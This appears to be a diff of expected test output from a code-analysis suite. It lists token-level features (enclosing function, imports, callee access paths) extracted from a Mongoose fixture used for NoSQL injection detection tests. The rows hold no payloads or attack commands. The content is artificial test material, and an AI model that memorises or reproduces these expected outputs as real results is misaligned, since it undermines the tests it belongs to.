findOneAndRemove | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:11:125:26 | findOneAndRemove | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:11:125:26 | findOneAndRemove | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:11:125:26 | findOneAndRemove | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:28:125:31 | cond | CalleeFlexibleAccessPath | Document.findOneAndRemove | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:28:125:31 | cond | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:28:125:31 | cond | calleeImports | mongoose | @@ -2980,6 +14817,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:28:125:31 | cond | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:28:125:31 | cond | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:28:125:31 | cond | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:2:126:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:2:126:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:2:126:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:2:126:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:2:126:26 | Documen ... dUpdate | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:2:126:26 | Documen ... dUpdate | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:2:126:26 | Documen ... dUpdate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:2:126:26 | Documen ... dUpdate | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:2:126:35 | Documen ... ond, Y) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:2:126:35 | Documen ... ond, Y) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:2:126:35 | Documen ... ond, Y) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:2:126:35 | Documen ... ond, Y) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:2:126:35 | exceptional return of Documen ... ond, Y) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:2:126:35 | exceptional return of Documen ... ond, Y) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:2:126:35 | exceptional return of Documen ... ond, Y) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:2:126:35 | exceptional return of Documen ... ond, Y) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:11:126:26 | findOneAndUpdate | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:11:126:26 | findOneAndUpdate | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:11:126:26 | findOneAndUpdate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:11:126:26 | findOneAndUpdate | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:28:126:31 | cond | CalleeFlexibleAccessPath | Document.findOneAndUpdate | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:28:126:31 | cond | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:28:126:31 | cond | calleeImports | mongoose | @@ -2996,6 +14853,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:34:126:34 | Y | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:34:126:34 | Y | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:126:34:126:34 | Y | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:2:127:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:2:127:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:2:127:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:2:127:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:2:127:16 | Document.update | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:2:127:16 | Document.update | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:2:127:16 | Document.update | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:2:127:16 | Document.update | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:2:127:25 | Documen ... ond, Y) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:2:127:25 | Documen ... ond, Y) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:2:127:25 | Documen ... ond, Y) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:2:127:25 | Documen ... ond, Y) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:2:127:25 | exceptional return of Documen ... ond, Y) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:2:127:25 | exceptional return of Documen ... ond, Y) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:2:127:25 | exceptional return of Documen ... ond, Y) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:2:127:25 | exceptional return of Documen ... ond, Y) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:11:127:16 | update | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:11:127:16 | update | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:11:127:16 | update | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:11:127:16 | update | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:18:127:21 | cond | CalleeFlexibleAccessPath | Document.update | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:18:127:21 | cond | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:18:127:21 | cond | calleeImports | mongoose | @@ -3012,6 +14889,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:24:127:24 | Y | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:24:127:24 | Y | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:127:24:127:24 | Y | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:2:128:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:2:128:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:2:128:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:2:128:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:2:128:20 | Document.updateMany | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:2:128:20 | Document.updateMany | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:2:128:20 | Document.updateMany | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:2:128:20 | Document.updateMany | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:2:128:29 | Documen ... ond, Y) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:2:128:29 | Documen ... ond, Y) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:2:128:29 | Documen ... ond, Y) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:2:128:29 | Documen ... ond, Y) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:2:128:29 | exceptional return of Documen ... ond, Y) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:2:128:29 | exceptional return of Documen ... ond, Y) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:2:128:29 | exceptional return of Documen ... ond, Y) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:2:128:29 | exceptional return of Documen ... ond, Y) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:11:128:20 | updateMany | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:11:128:20 | updateMany | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:11:128:20 | updateMany | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:11:128:20 | updateMany | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:22:128:25 | cond | CalleeFlexibleAccessPath | Document.updateMany | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:22:128:25 | cond | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:22:128:25 | cond | calleeImports | mongoose | @@ -3028,6 +14925,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:28:128:28 | Y | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:28:128:28 | Y | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:128:28:128:28 | Y | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:2:129:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:2:129:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:2:129:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:2:129:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:2:129:19 | Document.updateOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:2:129:19 | Document.updateOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:2:129:19 | Document.updateOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:2:129:19 | Document.updateOne | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:2:129:28 | Documen ... ond, Y) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:2:129:28 | Documen ... ond, Y) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:2:129:28 | Documen ... ond, Y) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:2:129:28 | Documen ... ond, Y) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:2:129:28 | exceptional return of Documen ... ond, Y) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:2:129:28 | exceptional return of Documen ... ond, Y) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:2:129:28 | exceptional return of Documen ... ond, Y) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:2:129:28 | exceptional return of Documen ... ond, Y) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:11:129:19 | updateOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:11:129:19 | updateOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:11:129:19 | updateOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:11:129:19 | updateOne | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:21:129:24 | cond | CalleeFlexibleAccessPath | Document.updateOne | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:21:129:24 | cond | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:21:129:24 | cond | calleeImports | mongoose | @@ -3044,6 +14961,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:27:129:27 | Y | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:27:129:27 | Y | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:129:27:129:27 | Y | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:2:130:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:2:130:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:2:130:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:2:130:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:2:130:14 | Document.find | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:2:130:14 | Document.find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:2:130:14 | Document.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:2:130:14 | Document.find | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:2:130:27 | Documen ... : id }) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:2:130:27 | Documen ... : id }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:2:130:27 | Documen ... : id }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:2:130:27 | Documen ... : id }) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:2:130:27 | exceptional return of Documen ... : id }) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:2:130:27 | exceptional return of Documen ... : id }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:2:130:27 | exceptional return of Documen ... : id }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:2:130:27 | exceptional return of Documen ... : id }) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:11:130:14 | find | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:11:130:14 | find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:11:130:14 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:11:130:14 | find | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:16:130:26 | { _id: id } | CalleeFlexibleAccessPath | Document.find | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:16:130:26 | { _id: id } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:16:130:26 | { _id: id } | calleeImports | mongoose | @@ -3052,6 +14989,18 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:16:130:26 | { _id: id } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:16:130:26 | { _id: id } | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:16:130:26 | { _id: id } | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:18:130:20 | _id | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:18:130:20 | _id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:18:130:20 | _id | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:18:130:20 | _id | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:18:130:24 | _id: id | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:18:130:24 | _id: id | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:18:130:24 | _id: id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:18:130:24 | _id: id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:18:130:24 | _id: id | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:18:130:24 | _id: id | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:18:130:24 | _id: id | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:18:130:24 | _id: id | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:23:130:24 | id | CalleeFlexibleAccessPath | Document.find | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:23:130:24 | id | InputAccessPathFromCallee | 0._id | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:23:130:24 | id | InputArgumentIndex | 0 | @@ -3061,6 +15010,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:23:130:24 | id | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:23:130:24 | id | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:130:23:130:24 | id | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:2:131:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:2:131:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:2:131:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:2:131:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:2:131:14 | Document.find | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:2:131:14 | Document.find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:2:131:14 | Document.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:2:131:14 | Document.find | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:2:131:36 | Documen ... id } }) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:2:131:36 | Documen ... id } }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:2:131:36 | Documen ... id } }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:2:131:36 | Documen ... id } }) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:2:131:36 | exceptional return of Documen ... id } }) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:2:131:36 | exceptional return of Documen ... id } }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:2:131:36 | exceptional return of Documen ... id } }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:2:131:36 | exceptional return of Documen ... id } }) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:11:131:14 | find | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:11:131:14 | find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:11:131:14 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:11:131:14 | find | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:16:131:35 | { _id: { $eq: id } } | CalleeFlexibleAccessPath | Document.find | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:16:131:35 | { _id: { $eq: id } } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:16:131:35 | { _id: { $eq: id } } | calleeImports | mongoose | @@ -3069,6 +15038,18 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:16:131:35 | { _id: { $eq: id } } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:16:131:35 | { _id: { $eq: id } } | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:16:131:35 | { _id: { $eq: id } } | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:18:131:20 | _id | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:18:131:20 | _id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:18:131:20 | _id | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:18:131:20 | _id | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:18:131:33 | _id: { $eq: id } | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:18:131:33 | _id: { $eq: id } | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:18:131:33 | _id: { $eq: id } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:18:131:33 | _id: { $eq: id } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:18:131:33 | _id: { $eq: id } | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:18:131:33 | _id: { $eq: id } | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:18:131:33 | _id: { $eq: id } | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:18:131:33 | _id: { $eq: id } | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:23:131:33 | { $eq: id } | CalleeFlexibleAccessPath | Document.find | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:23:131:33 | { $eq: id } | InputAccessPathFromCallee | 0._id | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:23:131:33 | { $eq: id } | InputArgumentIndex | 0 | @@ -3078,6 +15059,18 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:23:131:33 | { $eq: id } | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:23:131:33 | { $eq: id } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:23:131:33 | { $eq: id } | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:25:131:27 | $eq | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:25:131:27 | $eq | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:25:131:27 | $eq | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:25:131:27 | $eq | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:25:131:31 | $eq: id | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:25:131:31 | $eq: id | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:25:131:31 | $eq: id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:25:131:31 | $eq: id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:25:131:31 | $eq: id | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:25:131:31 | $eq: id | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:25:131:31 | $eq: id | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:25:131:31 | $eq: id | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:30:131:31 | id | CalleeFlexibleAccessPath | Document.find | | 